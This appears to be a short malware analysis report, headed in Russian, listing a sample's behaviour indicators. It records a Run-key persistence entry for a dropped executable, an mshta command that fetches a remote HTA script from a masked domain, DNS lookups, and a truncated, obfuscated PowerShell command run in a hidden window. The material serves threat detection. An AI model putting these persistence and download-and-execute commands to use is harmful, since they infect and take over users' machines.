Техническая информация
- [<HKCU>\soFtWarE\micRosofT\WiNdOwS\CuRreNTveRsIOn\ruN] 'pma' = 'C:\Users\Public\pma.exe'
- '<SYSTEM32>\mshta.exe' http://ra###seed.com/ed/out-749961712.hta
- 'C:\users\public\pma.exe'
- C:\users\public\pma.exe
- http://ra###seed.com/ed/out-749961712.hta
- DNS ASK ra###seed.com
- DNS ASK k0##a.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$xbvordlw = Get-Random -Min 3 -Max 4;$dhtfiokxcjw = ([char[]]([char]97..[char]122));$orhguizfkl = -join ($dhtfiokxcjw | Get-Random -Count $x...' (со скрытым окном)